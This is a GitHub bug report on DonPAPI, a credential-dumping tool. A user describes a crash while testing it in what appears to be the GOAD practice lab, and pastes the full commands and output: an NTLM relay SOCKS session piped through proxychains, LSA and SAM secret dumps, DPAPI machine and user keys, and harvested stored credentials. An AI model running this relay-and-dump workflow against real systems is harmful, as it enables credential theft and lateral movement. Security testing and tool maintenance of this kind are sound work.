login-securite / DonPAPI

Dumping DPAPI credz remotely
GNU General Public License v3.0

[bug] struct.error: ('unpack requires a buffer of 4 bytes', "When unpacking field 'CryptAlgo | <L=0 | b''[:4]'", 'When unpacking field \'Blob #66

Closed DummyKitty closed 5 days ago

DummyKitty commented 7 months ago

When I follow the steps on GOAD, it produces the following errors:

└─$ proxychains -f /etc/proxychains_1080.conf DonPAPI -no-pass NORTH/EDDARD.STARK@192.168.56.22
[proxychains] config file found: /etc/proxychains_1080.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

         ,                                                                      
       ,                                                 LeHack Release! 💀                       
        (                                                                       
       .                                          by Touf & Zblurx @ Login Sécurité                       
                                &&&&&&                                                             
     &&&&&%%%.                  &&&&&&                                          
      &&&&%%%              &&&& &&&&&&       &&&&&&            &&&&&.           
      &&&&%%%           &&&&&&& &&&&&&    &&&&&&&&&&&&&     &&&&&&&&&&&         
      &&&&%%%         &&&&&&&&& &&&&&&  &&&&&&&&&&&&&&&&   &&&&&&&&&&&&&        
    &&&&&&%%%%%       &&&&&&    &&&&&&  &&&&&&    &&&&&&   &&&&&   &&&&&   #####  
 &&&&&&&&&%%%%%%%     &&&&&&&&&&&&&&&&  (&&&&&&&&&&&&&&&   &&&&&   &&&&&   # # #
 &/&/////////////%      &&&&&&&&&&&&      &&&&&&&&&&&&     &&&&&   &&&&&   #####
&&/&/#////////(//%         &&&&&&            &&&&&&        &&&&&   &&&&&    ###
&&/&/////////////%        
&&/&/////////////%        &&&&&&&&&        &&&&&&&&&&        &&&&&&&&&     &&&&&
&&/&//////////(//%     &&&&&&&&&&&&&&    &&&&&&&&&&&&&&   &&&&&&&&&&&&&&   &&&&&
&&/&/////////////%     &&&&&&   &&&&&&  &&&&&&   &&&&&&&  &&&&&&   &&&&&&  &&&&&
&&/&///////////(/%    &&&&&&    &&&&&&  &&&&&&    &&&&&& &&&&&&    &&&&&&  &&&&&
&&/&///(/////////%    &&&&&& &&&&&&&&&  &&&&&&&&& &&&&&& &&&&&& &&&&&&&&&  &&&&&
&&/&/////////////%    &&&&&& &&&&&&&      &&&&&&& &&&&&& &&&&&& &&&&&&&    &&&&&
&&#&###########/#%    &&&&&&                             &&&&&&                 
&&###############%    &&&&&&                             &&&&&&                

INFO Initializing database ./donpapi.db
INFO Loaded 1 targets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] CASTELBLACK (domain:north.sevenkingdoms.local) (Windows 10.0 Build 17763) [SMB Signing Disabled]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO host: \\192.168.56.98, user: eddard.stark, active:  2562, idle:     0
INFO Adding connected user eddard.stark from \\192.168.56.98
INFO host: \\192.168.56.98, user: robb.stark, active:  2616, idle:  2616
INFO Adding connected user robb.stark from \\192.168.56.98
INFO [192.168.56.22] [+] Found user .NET v2.0
INFO [192.168.56.22] [+] Found user .NET v2.0 Classic
INFO [192.168.56.22] [+] Found user .NET v4.5
INFO [192.168.56.22] [+] Found user .NET v4.5 Classic
INFO [192.168.56.22] [+] Found user Administrator
INFO [192.168.56.22] [+] Found user All Users
INFO [192.168.56.22] [+] Found user Classic .NET AppPool
INFO [192.168.56.22] [+] Found user Default
INFO [192.168.56.22] [+] Found user Default User
INFO [192.168.56.22] [+] Found user Public
INFO [192.168.56.22] [+] Found user robb.stark
INFO [192.168.56.22] [+] Found user sql_svc
INFO [192.168.56.22] [+] Found user vagrant
INFO [192.168.56.22] [+] Dumping LSA Secrets
INFO [192.168.56.22] [+] Dumping SAM Secrets
INFO [192.168.56.22] [+] SAM : Collected 6 hashes 
INFO [192.168.56.22] [+] Gathering DPAPI Secret blobs on the target
INFO [192.168.56.22] [+] Gathering Wifi Keys
INFO [192.168.56.22] [+] Gathering Vaults
INFO [192.168.56.22] [+] Gathering Certificates Secrets 
Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/donpapi/lib/certificates.py", line 403, in loot_privatekeys
    masterkey_guid = self.get_masterkey_guid_for_privatekey(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/donpapi/lib/certificates.py", line 516, in get_masterkey_guid_for_privatekey
    blob=PVKFile(privatekey_bytes)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 87, in __init__
    self.fromString(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 152, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 382, in unpack
    return dataClassOrCode(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 87, in __init__
    self.fromString(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 152, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 326, in unpack
    return self.unpack(two[0],data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 385, in unpack
    return unpack(format, data)[0]
struct.error: ('unpack requires a buffer of 4 bytes', "When unpacking field 'CryptAlgo | <L=0 | b''[:4]'", 'When unpacking field \'Blob | : | b\'[binary blob omitted]\'[:1524]\'')
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering Chrome Secrets 
INFO [192.168.56.22] [+] Gathering MSEdge Secrets 
INFO [192.168.56.22] [+] Gathering Mozilla Secrets 
INFO [192.168.56.22] [+] Gathering mRemoteNG Secrets 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering VNC Passwords
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering Recent Files and Desktop Files 
/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/LnkParse3/target_factory.py:87: UserWarning: Unknown TargetID `195`
  warnings.warn(msg)

While ntlmrelayx is listening on 1080:

ntlmrelayx> socks
Protocol  Target         Username            AdminStatus  Port 
--------  -------------  ------------------  -----------  ----
SMB       192.168.56.23  NORTH/ROBB.STARK    FALSE        445  
SMB       192.168.56.23  NORTH/EDDARD.STARK  FALSE        445  
SMB       192.168.56.22  NORTH/ROBB.STARK    FALSE        445  
SMB       192.168.56.22  NORTH/EDDARD.STARK  TRUE         445  

DummyKitty commented 7 months ago

But when I use version branch v1.0.2, everything is fine.

└─$ proxychains -f /etc/proxychains_1080.conf DonPAPI -no-pass NORTH/EDDARD.STARK@192.168.56.22 
[proxychains] config file found: /etc/proxychains_1080.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Impacket v0.11.0 - Copyright 2023 Fortra

INFO Initializing database ./seatbelt.db
INFO Loaded 1 targets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] CASTELBLACK (domain:north.sevenkingdoms.local) (Windows 10.0 Build 17763) [SMB Signing Disabled]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO host: \\192.168.56.98, user: eddard.stark, active:  5214, idle:     0
INFO host: \\192.168.56.98, user: robb.stark, active:  5268, idle:  5268
INFO [192.168.56.22] [+] Found user .NET v2.0
INFO [192.168.56.22] [+] Found user .NET v2.0 Classic
INFO [192.168.56.22] [+] Found user .NET v4.5
INFO [192.168.56.22] [+] Found user .NET v4.5 Classic
INFO [192.168.56.22] [+] Found user Administrator
INFO [192.168.56.22] [+] Found user All Users
INFO [192.168.56.22] [+] Found user Classic .NET AppPool
INFO [192.168.56.22] [+] Found user Default
INFO [192.168.56.22] [+] Found user Default User
INFO [192.168.56.22] [+] Found user Public
INFO [192.168.56.22] [+] Found user robb.stark
INFO [192.168.56.22] [+] Found user sql_svc
INFO [192.168.56.22] [+] Found user vagrant
INFO [192.168.56.22]  [+] Dumping LSA Secrets
INFO [192.168.56.22] [+]  LSA :  vagrant : vagrant 
INFO [192.168.56.22] [-] Found DPAPI Machine key : 0x6787e5397633e7f7ff26175df0cf21d9c5b55cf5
INFO [192.168.56.22] [-] Found DPAPI User key : 0x15b4b03bef61c9df3de901a855fd9320085f9e28
INFO [192.168.56.22] [-] Found DPAPI Machine key : 0x68921a34ad1633847c43f119d7b9371145a58f4c
INFO [192.168.56.22] [-] Found DPAPI User key : 0xb4045e1ea262dfe8f7497c03d748f29175cd5a0d
INFO [192.168.56.22] [+]  LSA :  NL$KM_history : 10a01429cde3435824372b048f67cdf38a962f6edda9f4c33e4bcb66faf65f17dbe3878d42b4bfaf2a9b90b84d6cdd8e611395ebc860971850ea2f5fdf271f37                                                       
INFO [192.168.56.22]  [+] Dumping SAM Secrets
INFO [192.168.56.22] [+]  SAM : Collected 6 hashes 
INFO [192.168.56.22] [+] Gathering DPAPI Secret blobs on the target
INFO [192.168.56.22] [+]  
[CREDENTIAL]                                                                                                        
LastWritten : 2023-11-24 09:18:10                                                                                   
Flags       : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)                                        
Persist     : 0x2 (CRED_PERSIST_LOCAL_MACHINE)                                                                      
Type        : 0x1 (CRED_PERSIST_SESSION)                                                                            
Target      : WindowsLive:target=virtualapp/didlogical                                                              
Description : PersistedCredential                                                                                   
Unknown     :                                                                                                       
Username    : 02odnqztzydhtbsm                                                                                      
Unknown3     :                                                                                                      

INFO [192.168.56.22] [+]  
[CREDENTIAL]                                                                                                        
LastWritten : 2023-11-24 09:17:03                                                                                   
Flags       : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)                                        
Persist     : 0x2 (CRED_PERSIST_LOCAL_MACHINE)                                                                      
Type        : 0x1 (CRED_PERSIST_SESSION)                                                                            
Target      : WindowsLive:target=virtualapp/didlogical                                                              
Description : PersistedCredential                                                                                   
Unknown     :                                                                                                       
Username    : 02kqimgougaimkhu                                                                                      
Unknown3     :                                                                                                      

INFO [192.168.56.22] [+] Gathering Wifi Keys
INFO [192.168.56.22] [+] Gathering Vaults
INFO [192.168.56.22] [+] Gathering Chrome Secrets 
INFO [192.168.56.22] [+] Gathering Mozilla Secrets 
INFO [192.168.56.22] [+] Gathering VNC Passwords
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering mRemoteNG Secrets 
INFO [192.168.56.22] [+] Gathering Recent Files and Desktop Files 
/home/kali/.pyenv/versions/3.9.10/lib/python3.9/site-packages/LnkParse3-1.3.2-py3.9.egg/LnkParse3/target_factory.py:87: UserWarning: Unknown TargetID `195`
  warnings.warn(msg)
INFO [+] Generating report

zblurx commented 5 days ago

Should be fixed now. Feel free to reopen if this happens again.